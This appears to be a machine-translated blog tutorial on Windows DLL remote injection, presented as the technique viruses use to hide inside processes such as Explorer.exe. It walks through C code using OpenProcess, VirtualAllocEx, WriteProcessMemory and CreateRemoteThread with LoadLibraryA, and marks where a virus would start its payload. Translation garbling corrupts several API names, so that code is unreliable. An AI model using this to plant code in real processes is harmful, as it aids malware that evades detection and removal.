Detailed DLL remote injection technology

xiaoxiao2021-04-01  227

The remote injection technology of the DLL is a technology that is currently widely used by Win32 viruses. Vestrosities using this technique are typically located in a DLL. When the system is started, an EXE program loads this DLL to run in some system processes (such as Explorer.exe). In this way, the ordinary process manager is hard to find this virus, and even if it is discovered, it is difficult to clear because the DLL will not uninstall in memory as long as the process of virus is parasitic. It is impossible to delete this DLL file in the Explorer, it is really a double carving. I remember that when QQ tail viruses were ravaged in 2003, they had already used this technique. At the beginning of 2004, I have tried to simulate a QQ tail virus, but I jumped over the DLL remote loading technology. Until recently, several friends were seen in the school forum, couldn't help but pick up this dust from my memory, to meet the vast number of technicians. Prerequisites Before reading this article, you need to learn the following API functions: · OpenProcess - Used to open the target process to be parasitic. · VirtualaLalkEx / VirtualFreeEx - to assign / release memory space in the target process. · WriteProcessMemory - Used to write to the DLL name you want to load in the target process. · CreateremoteThread - Remote Load DLL core content for controlling the target process call API function. • The LoadLibrary - The target process loads the virus DLL by calling this function. Here I only give a brief function description, see MSDN for detailed features and presentations on functions. The sample program I will use a simple example virus.exe in the following spaces to implement this technology. This example is shown below: First run target.exe, this file is a "Hello, World" program generated with Win32 Application Wizard, used as a parasitic target process. Then enter the name "Target.exe" of the process in the editing control of the interface, click the "Injection DLL" button, this time Virus.exe is injected into the target.exe process in the current directory. After injecting DLL.dll, you can also uninstall the already injectable DLL after the "uninstall DLL". This analog virions DLL.dll Win32 DLL is a simple program that only one entry function DllMain composition: BOOL WINAPI DllMain (HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {switch (fdwReason) {case DLL_PROCESS_ATTACH: {MessageBox ( NULL, _T ("DLL has entered the target process."), _T ("information"), MB_ICONITION;} Break; case dll_process_detach: {MessageBox (NULL, _T ("DLL has been uninstalled from the target process."), _T ( "Information"), MB_ICONITION;} Break;} Return True; .

For a real virion, it is often handling the DLL_Process_attach event, where the startup virus code is added: Case DLL_Process_attach: {startvirus ();} Break; Injection! Now we have to start our injection. First, we need to find the target process: DWORD FindTarget (LPCTSTR lpszProcess) {DWORD dwRet = 0; HANDLE hSnapshot = CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS, 0); PROCESSENTRY32 pe32; pe32.dwSize = sizeof (PROCESSENTRY32); Process32First (hSnapshot, & pe32); do {if (lstrcmpi (pe32.szExeFile, lpszProcess) == 0) {dwRet = pe32.th32ProcessID; break;}} while (Process32Next (hSnapshot, & pe32)); CloseHandle (hSnapshot); return dwRet;} I used here Tool Help Library, of course, if you are an NT system, you can also choose the PSAPI library. The purpose of this code is to find the corresponding process in the current system through a given process name and return the ID of the process. After obtaining the process ID, you can call OpenProcess to open the target process: // Open the target process HANDLE hProcess = OpenProcess (PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, dwProcessID); now it is necessary to talk about OpenProcess first parameter specifies the three Permission. Under Win32 systems, each process has its own 4G virtual address space, and each process is independent of each process. If a process needs to complete the work across the process, then it must have the corresponding operational permissions of the target process. Here, process_create_thread indicates that I can create a new thread in this process by returning process handle, which is to call CreateRemoteThread's permissions; as in the process, the process_vm_operation indicates that the permission to assign / release memory in the process, that is, call VirtualaLalkEx / VirtualFreeex's permissions; Process_VM_WRITE indicates that you can write data to the address space of the process, which is to call WriteProcessMemory permissions. The target process has been opened, then how do we inject DLL into it? Before this, I invite you to see a line of code, how to explicitly load the DLL in this process: hmodule hdll = loadingLibrary ("dll.dll"); then, if you can control the target process to call LoadLibrary, you can do not complete the DLL. Did the remote injection? This is true that we can start LoadLibrary as a thread of the target process with CreateRemoteThread, so you can complete the "Control Target Process Call LoadLibrary".

Here, maybe you will want to write a code like this: DWORD DWID; LPVOID PFUNC = LoadLibraryA; handle hthread = CreateRemThread (HPRocess, NULL, 0, (LPTHREAD_START_ROUTINE) PFUNC, (LPVOID) "DLL.dll", 0, & dwid); But the result will definitely make you disappointing - injection DLL failed!

So let's analyze the cause of failure. I said before, under Win32 system, each process has its own 4G virtual address space, and each process is independent of each other. Here, as a string "dll.dll" in the parameter, "DLL.dll" is actually a value, which means that this string is located in the Virus.exe address space, and this address is passed to target.exe, it Point to something will lose effectiveness. For example,, for example, the two buildings in the A, B, I live in the 401st; then the 401 live in the building, who I certainly can't be sure - that is, 401 this house number lost in the B building. Validity And if I want to stay at the B floor, I must ask the building of the building to arrange new accommodations to me in the building (of course, this new residence is 401 is not necessarily). From this point of view, I need to do such a series of slightly complicated procedures - first assign a memory space in the target.exe target process, then write to this space to the DLL name I want to load, and then call CreateRemoteThread . This code is this: // Write the DLL name DLL name DLL name DLL name DLL name DWord Dwsize, dwwritten 1; LPVOID LPBUF = Virtualalalk (HProcess, Null, DWSize, MEM_COMMIT, PAGE_READWRITE); IF (NULL == lpbuf) {CloseHandle (HPROCESS); // Failure Processing} IF (WriteProcessMemory (HProcess, LPBUF, (LPVOID) LPSZDLL, DWSIZE, & DWWWWRITEN) {// To write the number of bytes and actual writing bytes Number, still a failure IF (dwwritten! = Dwsize) {VirtualFreeex (HProcess, LPBUF, DWSIZE, MEM_DECOMMIT); CloseHandle (HPROCESS); // Failed handling}} else {closehandle (hprocess); // failed handling} / / target process calls LoadLibrary, load the DLL DWORD dwID; LPVOID pFunc = LoadLibraryA; HANDLE hThread = CreateRemoteThread (hProcess, NULL, 0, (LPTHREAD_START_ROUTINE) pFunc, lpBuf, 0, & dwID); need to say two things, first, because I want to allocate memory space for the ANSI string in the target process, so all the parties related to the target process clearly use the suffix "a" API function - of course, if you want to use the Unicode string, you can For the suffix is ​​the API of "W"; second, here LoadLibrary's pointer I am the address of the LoadLibrarya of this process, because LoadLibraryA / LoadLibraryw is located in kernel32.dll, while each application under Win32 will Load the kernel32.dll into a fixed address in the process address space, so the function address here is also valid in Target.exe.

转载请注明原文地址:https://www.9cbs.com/read-131205.html

New Post(0)